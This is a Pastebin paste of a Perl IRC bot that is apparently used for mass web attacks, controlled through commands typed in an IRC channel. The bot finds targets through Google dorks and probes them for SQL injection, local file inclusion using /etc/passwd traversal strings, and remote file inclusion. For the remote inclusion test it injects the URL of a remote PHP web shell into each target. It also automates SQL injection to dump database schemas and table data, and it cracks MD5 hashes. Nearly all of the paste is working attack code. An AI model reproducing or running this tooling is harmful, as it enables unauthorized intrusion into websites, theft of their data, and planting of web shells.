API tools faq
paste
Advertisement
Guest User

Edoindoxploit

a guest
May 24th, 2019
118
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 31.67 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/perl
  2. #
  3. # OOO OOO OO OO OO
  4. # OO O O O O
  5. # O O O OO OO O O O O OO OOO OOOO OOOOO
  6. # O O O O O O O OOO OO OOOOOO O
  7. # O OO O O O O O O O O OOOOOO
  8. # OOO OO OOOOO OOOOO OOOOO OOO OOO OOOOO OOOOO OOOO OO
  9. ################################################################################################################################
  10. # AlpHaNiX IRC BOT V1.5 beta
  11. ################################################################################################################################
  12. # [+] What's New in this version ?
  13. # 1/ RFI Vulnerable Scanner
  14. # 2/ LFI Vulnerable Scanner
  15. # 3/ an msg when scan finish
  16. # 4/ msg appear once banned from google search
  17. ################################################################################################################################
  18. # [+] About :
  19. ################################################################################################################################
  20. # Language : PERL
  21. # Coder : AlpHaNiX
  22. ################################################################################################################################
  23. # [+] Usage :
  24. ################################################################################################################################
  25. # ------------ You Must Change BOT Config First Of ALL
  26. # ------------ Bot Commands :
  27. #-- !md5 <word> => make an md5 hash
  28. #-- !md5crack <hash> => crack md5 hashes
  29. #-- !base64 <word> => encode with base64
  30. #-- !basedecode <text to decode> => decode base64 text
  31. #-- !lastsploits => to get lastest sploits from milw0rm
  32. #-------------------------------------{ SQL INJECTION FUNCTIONS }-----------------------------------------
  33. #-- !col <vuln> => calculate number of columns in a sql vulnerable
  34. #-- !det <vuln> * => MySQL DB Details (version , user ,db , dir )
  35. #-- !schema <vuln> * => Extract all (DB's , Tables , Columns) names
  36. #-- !dump <vuln> * => Dump Data from a column & table
  37. #-- !ms <vuln> => Get MsSQL DB Details
  38. # ===>>> * you must enter vuln this way http://target.com/page.php?id=0+union+select+1,nullarea,2,3
  39. #-------------------------------------{ Vulnerability scan FUNCTIONS }-----------------------------------------
  40. #-- !sqlscan <dork> => fetch url's from google and check if sql vuln or not
  41. #-- !rfiscan <dork> => fetch url's from google and check if rfi vuln or not
  42. #-- !lfiscan <dork> => fetch url's from google and check if lfi vuln or not
  43. ################################################################################################################################
  44. # [+] Contact :
  45. ################################################################################################################################
  46. # E-Mail Address : AlpHa[AT]Hacker[DOT]BZ
  47. # Home Page : http://NullArea.Net
  48. # My Blog : #http://NullArea.Net/blog
  49. ################################################################################################################################
  50. # [+] Greetz :
  51. ################################################################################################################################
  52. # Greetz For My Best Friend Zigma !
  53. # Special Thanks For All of : Djekmani4ever / Unary / DexTeR Corleon / r1z
  54. ################################################################################################################################
  55. # -------------------- Made In Tunisia
  56. ################################################################################################################################
  57. use IO::Socket::INET ;
  58. use LWP::UserAgent;
  59. use LWP::Simple;
  60. use Digest::MD5 qw(md5_hex);
  61. use MIME::Base64;
  62. ############################################################################################
  63. my $server = "choopa.nj.us.dal.net"; # IRC Server
  64. my $port = "6667"; # IRC Server port
  65. my $nick = "edo[Scan]"; # Bot Nick
  66. my $channel = "#edoo"; # Channel to Join
  67. my $name = "nix akusapa alpha unr";
  68. my $phpshell = "https://raw.githubusercontent.com/linuxsec/indoxploit-shell/master/shell-v3.php"; #your phpshell link for RFI scan
  69. ############################################################################################
  70. system('cls');
  71. print "\n\n\n\n OOO OOO OO OO OO\n" ;
  72. print " OO O O O O\n" ;
  73. print " O O O OO OO O O O O OO OOO OOOO OOOOO\n" ;
  74. print " O O O O O O O OOO OO OOOOOO O\n" ;
  75. print " O OO O O O O O O O O OOOOOO\n" ;
  76. print " OOO OO OOOOO OOOOO OOOOO OOO OOO OOOOO OOOOO OOOO OO\n" ;
  77. print " \n\n AlpHaNiX IRC BOT V1 \n\n";
  78. print "\n [+] Connection To $server ....\n";
  79. ############################################################################################
  80. $connection = IO::Socket::INET->new(PeerAddr=>"$server",
  81. PeerPort=>"$port",
  82. Proto=>'tcp',
  83. Timeout=>'30') or die " [!] Couldnt Connect To $server\n";
  84. print " [+] Connected To $server ....\n\n";
  85. ############################################################################################
  86. print $connection "USER $name\n";
  87. print $connection "NICK $nick\r\n";
  88. ############################################################################################
  89. while($response = <$connection>)
  90. {
  91. print $response; #print IRC Response
  92. if($response =~ m/:(.*) 00(.*) (.*) :/){print $connection "JOIN $channel\r\n";} #-------Join Channel
  93. if($response =~ m/:(.*)!(.*) PRIVMSG $channel :!help/){&help;} #-------Print Help
  94. if($response =~ m/:(.*)!(.*) PRIVMSG $channel :!md5 (.*)$/){&md5encode;} #------- md5encoder
  95. if($response =~ m/:(.*)!(.*) PRIVMSG $channel :!md5crack (.*)$/){&md5cracker;} #-------md5cracker
  96. if($response =~ m/:(.*)!(.*) PRIVMSG $channel :!base64 (.*)$/){&base64;} #-------base64 encoder
  97. if($response =~ m/:(.*)!(.*) PRIVMSG $channel :!basedecode (.*)$/){&basedecode;}#-------base64decoder
  98. if($response =~ m/:(.*)!(.*) PRIVMSG $channel :!iplocation (.*)$/){&iplocation;}#-------ip locator
  99. if($response =~ m/:(.*)!(.*) PRIVMSG $channel :!lastsploits/){&milw0rm;} #-------last sploits
  100. if($response =~ m/:(.*)!(.*) PRIVMSG $channel :!sqlscan (.*)$/){&sqlscan;} #-------SQLi scanner
  101. if($response =~ m/:(.*)!(.*) PRIVMSG $channel :!lfiscan (.*)$/){&lfiscan;} #-------LFI Scanner
  102. if($response =~ m/:(.*)!(.*) PRIVMSG $channel :!rfiscan (.*)$/){&rfiscan;} #-------RFI Scanner
  103. if($response =~ m/:(.*)!(.*) PRIVMSG $channel :!col (.*)$/){&colcount;} #-------column counter
  104. if($response =~ m/:(.*)!(.*) PRIVMSG $channel :!det (.*)$/){&mysqldet;} #-------details grabber
  105. if($response =~ m/:(.*)!(.*) PRIVMSG $channel :!schema (.*)$/){&schema;} #-------schema extractor
  106. if($response =~ m/:(.*)!(.*) PRIVMSG $channel :!dump (.*)-(.*)-(.*)$/){&mysqldumper}#-------data dumper
  107. if($response =~ m/:(.*)!(.*) PRIVMSG $channel :!ms (.*)$/){&mssqldet} #-------mssql details grabber
  108. if($response =~ m/^PING (.*?)$/gi){print $connection "PONG ".$1."\r\n";} #-------ping reponse
  109. }
  110. ############################################################################################
  111. sub help
  112. {
  113. print $connection "PRIVMSG $channel :8,1 AlpHaNiX IRC BOT V1.5 Help : \r\n";
  114. print $connection "PRIVMSG $channel :8,1 \r\n";
  115. print $connection "PRIVMSG $channel :4,1 --------------== Encoding Services ==--------------\r\n";
  116. print $connection "PRIVMSG $channel :9,1 To Generate an MD5 Hash => : 11,1 !md5 word \r\n";
  117. print $connection "PRIVMSG $channel :9,1 To Crack an MD5 Hash => : 11,1 !md5crack Hash \r\n";
  118. print $connection "PRIVMSG $channel :9,1 To Encode with Base64 => : 11,1 !base64 word \r\n";
  119. print $connection "PRIVMSG $channel :9,1 To Decode Base64 => : 11,1 !basedecode base64 \r\n";
  120. print $connection "PRIVMSG $channel :4,1 ----------------== Other Services ==---------------\r\n";
  121. print $connection "PRIVMSG $channel :9,1 Check IP Location => : 11,1 !iplocation ip \r\n";
  122. print $connection "PRIVMSG $channel :9,1 Get lastest Sploits => : 11,1 !lastsploits \r\n";
  123. print $connection "PRIVMSG $channel :4,1 ----------------== SQL Injection ==----------------\r\n";
  124. print $connection "PRIVMSG $channel :9,1 MySQL Column Count => : 11,1 !col target \r\n";
  125. print $connection "PRIVMSG $channel :9,1 MySQL DB Details => : 11,1 !det target \r\n";
  126. print $connection "PRIVMSG $channel :9,1 MySQL Schema Extractor => : 11,1 !schema target \r\n";
  127. print $connection "PRIVMSG $channel :9,1 MySQL Data Dumper => : 11,1 !dump target \r\n";
  128. print $connection "PRIVMSG $channel :9,1 MsSQL Details => : 11,1 !ms target \r\n";
  129. print $connection "PRIVMSG $channel :4,1 ------------== Vulnerablitys Scanner ==------------\r\n";
  130. print $connection "PRIVMSG $channel :9,1 SQL Vuln Scanner => : 11,1 !sqlscan dork \r\n";
  131. print $connection "PRIVMSG $channel :9,1 LFI Vuln Scanner => : 11,1 !lfiscan dork \r\n";
  132. print $connection "PRIVMSG $channel :9,1 RFI Vuln Scanner => : 11,1 !rfiscan dork \r\n";
  133. }
  134. ############################################################################################
  135. sub md5encode
  136. {
  137. my $md5_hash = $3;
  138. my $asker = $1;
  139. my $md5_generated = md5_hex($md5_hash);
  140. print $connection "PRIVMSG $channel :4$asker , done =>6 $md5_generated\r\n";
  141. }
  142. ############################################################################################
  143. sub md5cracker
  144. {
  145. my $asker = $1;
  146. my $hash = $3;
  147. if (length($hash) != 33)
  148. {
  149. print $connection "PRIVMSG $channel :Not Valid MD5 Hash !\r\n";
  150. }
  151. else
  152. {
  153. my $ua = LWP::UserAgent->new();
  154. my $contents = $ua->get('http://md5.rednoize.com/?p&s=md5&q='.$hash);
  155. my $cracked = $contents->content;
  156. if ($cracked)
  157. {
  158. print $connection "PRIVMSG $channel :4$asker Cracked ! =>6 $cracked\r\n";
  159. }
  160. else
  161. {
  162. print $connection "PRIVMSG $channel :4$asker,6 Not Found !\r\n";
  163. }
  164. }
  165. }
  166. ############################################################################################
  167. sub base64
  168. {
  169. my $base64 = $3;
  170. my $asker = $1;
  171. my $base64_encoded = encode_base64($base64);
  172. print $connection "PRIVMSG $channel :4$asker,6 Encoded => $base64_encoded\r\n";
  173. }
  174. ############################################################################################
  175. sub basedecode
  176. {
  177. my $base64d = $3;
  178. my $asker = $1;
  179. my $base64_decoded = decode_base64($base64d);
  180. print $connection "PRIVMSG $channel :4$asker,6 Decoded => $base64_decoded\r\n";
  181. }
  182. ############################################################################################
  183. sub iplocation
  184. {
  185. my $asker = $1;
  186. my $ip = $3;
  187. if (length($ip) > 17)
  188. {
  189. print $connection "PRIVMSG $channel :6Not Real IP !\r\n";
  190. }
  191. else
  192. {
  193. my $ua = LWP::UserAgent->new();
  194. my $contents = $ua->get('http://www.melissadata.com/lookups/iplocation.asp?ipaddress='.$ip);
  195. my $found = $contents->content;
  196. if ($found =~ /<tr><td align="right">Country<\/td><td><b>(.*)<\/b><\/td><\/tr>/)
  197. {
  198. print $connection "PRIVMSG $channel :4$asker , The IP Location =>6 $1\r\n";
  199. }
  200. else
  201. {
  202. print $connection "PRIVMSG $channel :6Not Real IP !\r\n";
  203. }
  204. }
  205. }
  206. ############################################################################################
  207. sub milw0rm
  208. {
  209. my $rss = get('http://milw0rm.com/rss.php');
  210. my $xml = XMLin($rss);
  211. my $spl = scalar(@{$xml->{channel}->{item}});
  212. for ($i=0; $i<$spl; $i++)
  213. {
  214. print $connection "PRIVMSG $channel :4\n";
  215. print $connection "PRIVMSG $channel :6Date : $xml->{channel}->{item}->[$i]->{pubDate}\n";
  216. print $connection "PRIVMSG $channel :6Title: $xml->{channel}->{item}->[$i]->{title}\n";
  217. print $connection "PRIVMSG $channel :6Link : $xml->{channel}->{item}->[$i]->{link}\n\n";
  218. }
  219. }
  220. ############################################################################################
  221. sub sqlscan
  222. {
  223. my $asker = $1;
  224. my $dork = $3;
  225. print $connection "PRIVMSG $channel :4$asker 12[+] SQL Vulnerable Scan Started ....\r\n";
  226. print $connection "PRIVMSG $channel :4$asker 12[+] Dork : $dork ....\r\n";
  227. my $google = "http://www.google.com/search?hl=en&q=$dork&btnG=Search&start=" ;
  228. #----
  229. my $request = HTTP::Request->new(GET=>"$google"."$i");
  230. my $useragent = LWP::UserAgent->new(agent => 'Firefox 3.0.9');
  231. my $response = $useragent->request($request) ;
  232. my $con = $response->content;
  233. if ($con =~ m/restore your access as quickly as possible, so try again soon. In the meantime, if you suspect that your computer or network has been infected/i)
  234. { print $connection "PRIVMSG $channel :4$asker 12[!] Banned From Google Search !!\r\n"; }
  235. else
  236. {
  237. for ($i=0;$i<200;$i=$i+10)
  238. {
  239. my $request = HTTP::Request->new(GET=>"$google"."$i");
  240. my $useragent = LWP::UserAgent->new(agent => 'Mozilla 5.2');
  241. my $response = $useragent->request($request) ;
  242. my $con = $response->content;
  243. my $start='class=r><a href=\"';
  244. my $end= '" class=l>';
  245. while ( $con =~ m/$start(.*?)$end/g )
  246. {
  247. my $fl = $1;
  248. my $link = $fl.'0+order+by+9999999--';
  249. print $connection "PRIVMSG $channel :4$asker 12[!] Trying To Fuzz6 $1\r\n";
  250. my $ua = LWP::UserAgent->new();
  251. my $req = $ua->get($link);
  252. my $result = $req->content;
  253. if ($result=~ m/You have an error in your SQL syntax/i || $result=~ m/Query failed/i || $result=~ m/SQL query failed/i || $result=~ m/mysql_fetch_/i || $result=~ m/mysql_fetch_array/i || $result =~ m/mysql_num_rows/i || $result =~ m/The used SELECT statements have a different number of columns/i )
  254. {print $connection "PRIVMSG $channel :4$asker 12[!] Possible MySQL Vulnerable Website ->6 $fl\r\n";}
  255. elsif ($result=~ m/ODBC SQL Server Driver/i || $result=~ m/Unclosed quotation mark/i || $result=~ m/Microsoft OLE DB Provider for/i )
  256. {print $connection "PRIVMSG $channel :4$asker 12[!] Possible MsSQL Vulnerable Website ->6 $fl\r\n";}
  257. elsif ($result=~ m/Microsoft JET Database/i || $result=~ m/ODBC Microsoft Access Driver/i )
  258. {print $connection "PRIVMSG $channel :4$asker 12[!] Possible MS Access Vulnerable Website ->6 $fl\r\n";}
  259. }
  260. }
  261. print $connection "PRIVMSG $channel :4$asker 12[!] SQL Scan Finished !\r\n";
  262. }
  263. }
  264. ############################################################################################
  265. sub lfiscan
  266. {
  267. my $asker = $1;
  268. my $dork = $3;
  269. print $connection "PRIVMSG $channel :4$asker 12[+] LFI Vulnerable Scan Started ....\r\n";
  270. print $connection "PRIVMSG $channel :4$asker 12[+] Dork : $dork ....\r\n";
  271. my $google = "http://www.google.com/search?hl=en&q=$dork&btnG=Search&start=" ;
  272. @LFI = ('../etc/passwd',
  273. '../../etc/passwd',
  274. '../../../etc/passwd',
  275. '../../../../etc/passwd',
  276. '../../../../../etc/passwd',
  277. '../../../../../../etc/passwd',
  278. '../../../../../../../etc/passwd',
  279. '../../../../../../../../etc/passwd',
  280. '../../../../../../../../../etc/passwd',
  281. '../../../../../../../../../../etc/passwd',
  282. '../../../../../../../../../../../etc/passwd',
  283. '../../../../../../../../../../../../etc/passwd',
  284. '../../../../../../../../../../../../../etc/passwd',
  285. '../../../../../../../../../../../../../../etc/passwd',);
  286. my $request = HTTP::Request->new(GET=>"$google"."$i");
  287. my $useragent = LWP::UserAgent->new(agent => 'Mozilla 5.2');
  288. my $response = $useragent->request($request) ;
  289. my $con = $response->content;
  290. if ($con =~ m/restore your access as quickly as possible, so try again soon. In the meantime, if you suspect that your computer or network has been infected/i)
  291. { print $connection "PRIVMSG $channel :4$asker 12[!] Banned From Google Search !!\r\n"; }
  292. else
  293. {
  294. for ($i=0;$i<200;$i=$i+10)
  295. {
  296. my $start='class=r><a href=\"';
  297. my $end= '" class=l>';
  298. while ( $con =~ m/$start(.*?)$end/g )
  299. {
  300. print $connection "PRIVMSG $channel :4$asker 12[!] Trying To Fuzz6 $1\r\n";
  301. for ($j;$j<=14;$j++)
  302. {
  303. my $fl = $1;
  304. my $link = $fl.$LFI[$j];
  305. my $ua = LWP::UserAgent->new();
  306. my $req = $ua->get($link);
  307. my $result = $req->content;
  308. if ($result=~ m/root:x:/i)
  309. {print $connection "PRIVMSG $channel :4$asker 12[!] Possible LFI Vulnerable Website ->6 $fl\r\n";}
  310. }
  311. }
  312. }
  313. print $connection "PRIVMSG $channel :4$asker 12[!] LFI Scan Finished !\r\n";
  314. }
  315. }
  316. ############################################################################################
  317. sub rfiscan
  318. {
  319. my $asker = $1;
  320. my $dork = $3;
  321. print $connection "PRIVMSG $channel :4$asker 12[+] RFI Vulnerable Scan Started ....\r\n";
  322. print $connection "PRIVMSG $channel :4$asker 12[+] Dork : $dork ....\r\n";
  323. my $google = "http://www.google.com/search?hl=en&q=$dork&btnG=Search&start=" ;
  324. #----
  325. my $request = HTTP::Request->new(GET=>"$google"."$i");
  326. my $useragent = LWP::UserAgent->new(agent => 'Mozilla 5.2');
  327. my $response = $useragent->request($request) ;
  328. my $con = $response->content;
  329. if ($con =~ m/restore your access as quickly as possible, so try again soon. In the meantime, if you suspect that your computer or network has been infected/i)
  330. { print $connection "PRIVMSG $channel :4$asker 12[!] Banned From Google Search !!\r\n"; }
  331. else
  332. {
  333. for ($i=0;$i<200;$i=$i+10)
  334. {
  335. my $start='class=r><a href=\"';
  336. my $end= '" class=l>';
  337. while ( $con =~ m/$start(.*?)$end/g )
  338. {
  339. print $connection "PRIVMSG $channel :4$asker 12[!] Trying To Fuzz6 $1\r\n";
  340. my $fl = $1;
  341. my $link = $fl.$phpshell.'??';
  342. my $ua = LWP::UserAgent->new();
  343. my $req = $ua->get($link);
  344. my $result = $req->content;
  345. if ($result=~ m/uid=/i)
  346. {print $connection "PRIVMSG $channel :4$asker 12[!] Possible RFI Vulnerable Website ->6 $fl\r\n";}
  347. }
  348. }
  349. print $connection "PRIVMSG $channel :4$asker 12[!] RFI Scan Finished !\r\n";
  350. }
  351. }
  352. ############################################################################################
  353. sub colcount
  354. {
  355. my $asker = $1;
  356. print $connection "PRIVMSG $channel :4$asker 12[+] Column Counting Started , Please Wait ....\r\n";
  357. my $site = $3 ;
  358. my $null = "09+and+1=" ;
  359. my $code = "0+union+select+" ;
  360. my $add = "+" ;
  361. my $com = "--" ;
  362. my $injection = $site.$null.$code."0",$com ;
  363. my $request = HTTP::Request->new(GET=>$injection);
  364. my $useragent = LWP::UserAgent->new();
  365. my $response = $useragent->request($request);
  366. my $result = $response->content;
  367. if( $result =~ /You have an error in your SQL syntax/ || $result=~/Query failed/ || $result=~/SQL query failed/ || $result=~ /mysql_fetch_/ || $result=~ /mysql_fetch_array/ || $result =~ /mysql_num_rows/ || $result =~ /The used SELECT statements have a different number of columns/)
  368. {
  369. print $connection "PRIVMSG $channel :4$asker 12[+] This Website Is Vulnerable\n" ;
  370. print $connection "PRIVMSG $channel :4$asker 12[+] Working On It\n";
  371. }
  372. else
  373. {
  374. print $connection "PRIVMSG $channel :4$asker 10[!] This WebSite Is Not SQL Vulnerable !\n\n";
  375. }
  376. for ($i = 0 ; $i < 50 ; $i ++)
  377. {
  378. $col.=','.$i;
  379. $specialword.=','."0x617a38387069783030713938";
  380. if ($i == 0)
  381. {
  382. $specialword = '' ;
  383. $col = '' ;
  384. }
  385. $sql=$site.$null.$code."0x617a38387069783030713938".$specialword.$com ;
  386. my $ua = LWP::UserAgent->new();
  387. my $res = $ua->get($sql);
  388. $response=$res->content;
  389. if($response =~ /az88pix00q98/)
  390. {
  391. $i ++;
  392. print $connection "PRIVMSG $channel :4$asker 12[+] This Injection Have6 $i 12Columns\n" ;
  393. }
  394. }
  395. }
  396. ############################################################################################
  397. sub mysqldet
  398. {
  399. my $asker = $1;
  400. my $site = $3 ;
  401. my $selection = "concat(0x617a38387069783030713938,version(),0x617a38387069783030713938,database(),0x617a38387069783030713938,user(),0x617a38387069783030713938,\@\@datadir,0x617a38387069783030713938)";
  402. print $connection "PRIVMSG $channel :4$asker 12[+] Info Getting, Started Please Wait ....\r\n";
  403. if ($site =~ /(.*)NullArea(.*)/i)
  404. {
  405. $newlink = $1.$selection.$2.'--';
  406. my $ua = LWP::UserAgent->new();
  407. my $request = $ua->get($newlink);
  408. my $content = $request->content;
  409. if ($content =~ /az88pix00q98(.*)az88pix00q98(.*)az88pix00q98(.*)az88pix00q98(.*)az88pix00q98/)
  410. {
  411. print $connection "PRIVMSG $channel :4$asker 12[+] Database Version :6 $1\r\n";
  412. print $connection "PRIVMSG $channel :4$asker 12[+] Database Name :6 $2\r\n";
  413. print $connection "PRIVMSG $channel :4$asker 12[+] DB UserName :6 $3\r\n";
  414. print $connection "PRIVMSG $channel :4$asker 12[+] Databse Dir :6 $4\r\n";
  415. }
  416. else
  417. {
  418. print $connection "PRIVMSG $channel :4$asker 12[!] Failed\r\n";
  419. }
  420. }
  421. else
  422. {
  423. print $connection "PRIVMSG $channel :4$asker 12[!] Please Enter the target this way :6 http://target.net/page.php?id=0+union+select+1,2,nullarea,3\r\n";
  424. }
  425. }
  426. ############################################################################################
  427. sub schema
  428. {
  429. my $asker = $1;
  430. my $site = $3 ;
  431. my $selection = "concat(0x617a38387069783030713938,table_name,0x617a38387069783030713938,column_name,0x617a38387069783030713938,table_schema,0x617a38387069783030713938)";
  432. if ($site =~ /(.*)NullArea(.*)/i)
  433. {
  434. print $connection "PRIVMSG $channel :4$asker 12[+] 6Table 12:|: 6Column 12:|: 6Database\r\n";
  435. for ($i ; $i<=1500 ; $i++ )
  436. {
  437. $newstring = $1.$selection.$2.'+'.'from'.'+'.'information_schema.columns'.'+'.'LIMIT'.'+'.$i.','.'1'.'--';
  438. my $ua = LWP::UserAgent->new();
  439. my $request = $ua->get($newstring);
  440. my $content = $request->content;
  441. if ($content =~ /az88pix00q98(.*)az88pix00q98(.*)az88pix00q98(.*)az88pix00q98/)
  442. {
  443. print $connection "PRIVMSG $channel :4$asker 12[!] 6$1 12:|: 6$2 12:|: 6$3 \r\n";
  444. }
  445. }
  446. }
  447. else
  448. {
  449. print $connection "PRIVMSG $channel :4$asker 12[!] Please Enter the target this way :6 http://target.net/page.php?id=0+union+select+1,2,nullarea,3\r\n";
  450. }
  451. }
  452. ############################################################################################
  453. sub mysqldumper
  454. {
  455. my $asker = $1;
  456. my $site = $3 ;
  457. my $table = $5 ;
  458. my $selection = "concat(0x617a38387069783030713938,$4,0x617a38387069783030713938)";
  459. if ($site =~ /(.*)NullArea(.*)/i)
  460. {
  461. print $connection "PRIVMSG $channel :4$asker 12[+] 6 DATA\r\n";
  462. for ($i ; $i<=1500 ; $i++ )
  463. {
  464. $newstring = $1.$selection.$2.'+'.'from'.'+'.$table.'+'.'LIMIT'.'+'.$i.','.'1'.'--';
  465. my $ua = LWP::UserAgent->new();
  466. my $request = $ua->get($newstring);
  467. my $content = $request->content;
  468. if ($content =~ /az88pix00q98(.*)az88pix00q98/)
  469. {
  470. print $connection "PRIVMSG $channel :4$asker 12[!] 6 $1\r\n";
  471. }
  472. }
  473. }
  474. else
  475. {
  476. print $connection "PRIVMSG $channel :4$asker 12[!] Please Enter the target this way :6 http://target.net/page.php?id=0+union+select+1,2,nullarea,3-column_name-table_name\r\n";
  477. }
  478. }
  479. ############################################################################################
  480. sub mssqldet
  481. {
  482. my $asker = $1;
  483. print $connection "PRIVMSG $channel :4$asker 12[+] Getting Infos Started , Please Wait ....\r\n";
  484. my $target = $3 ;
  485. print "\n[+] Working On $target" ;
  486. my $version = 'convert(int,(select+@@version));--' ;
  487. my $system_user = 'convert(int,(select+system_user));--';
  488. my $db_name = 'convert(int,(select+db_name()));--';
  489. my $servername = 'convert(int,(select+@@servername));--' ;
  490. my $hostname = 'convert(int,(select+Host_Name()));--';
  491. my $site = $target ;
  492. my $injection = $site.$version ;
  493. my $request = HTTP::Request->new(GET=>$injection);
  494. my $useragent = LWP::UserAgent->new();
  495. my $response = $useragent->request($request)->as_string ;
  496. if ($response =~ /.*?value\s'/)
  497. {
  498. print $connection "PRIVMSG $channel :4$asker 12[+] This Website Is SQL Vulnerable ..\r\n";
  499. print $connection "PRIVMSG $channel :4$asker 12[+] Working On It ..\r\n";
  500.  
  501. $ver = $1 if ($response =~ /.*?value\s'(.*?)'\sto.*/sm) ;
  502.  
  503. print $connection "PRIVMSG $channel :4$asker 12[!] MsSQL Version Is : 6$ver\r\n";
  504.  
  505. my $injection = $site.$system_user ;
  506. my $request = HTTP::Request->new(GET=>$injection);
  507. my $useragent = LWP::UserAgent->new();
  508. $useragent->timeout(10);
  509. my $response = $useragent->request($request)->as_string ;
  510. $system_user = $1 if ($response =~ /.*value\s'(.*)'\sto.*/);
  511. print $connection "PRIVMSG $channel :4$asker 12[!] MsSQL System_User Is : 6$system_user\r\n";
  512.  
  513. my $injection = $site.$db_name ;
  514. my $request = HTTP::Request->new(GET=>$injection);
  515. my $useragent = LWP::UserAgent->new();
  516. $useragent->timeout(10);
  517. my $response = $useragent->request($request)->as_string ;
  518. $db_name = $1 if ($response =~ /.*value\s'(.*)'\sto.*/);
  519. print $connection "PRIVMSG $channel :4$asker 12[!] MsSQL Database Name Is : 6$db_name\r\n";
  520.  
  521. my $injection = $site.$servername ;
  522. my $request = HTTP::Request->new(GET=>$injection);
  523. my $useragent = LWP::UserAgent->new();
  524. $useragent->timeout(10);
  525. my $response = $useragent->request($request)->as_string ;
  526. $servername = $1 if ($response =~ /.*value\s'(.*)'\sto.*/);
  527. print $connection "PRIVMSG $channel :4$asker 12[!] MsSQL Server Name Is : 6$servername\r\n";
  528.  
  529. my $injection = $site.$hostname;
  530. my $request = HTTP::Request->new(GET=>$injection);
  531. my $useragent = LWP::UserAgent->new();
  532. $useragent->timeout(10);
  533. my $response = $useragent->request($request)->as_string ;
  534. $hostnames = $1 if ($response =~ /.*value\s'(.*)'\sto.*/);
  535. print $connection "PRIVMSG $channel :4$asker 12[!] MsSQL HostName Is : 6$hostnames\r\n";
  536. }
  537. else
  538. {
  539. print $connection "PRIVMSG $channel :4$asker 10[!] This Website Is Not SQL Vulnerable !\r\n";
  540. }
  541. }
  542. ############################################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!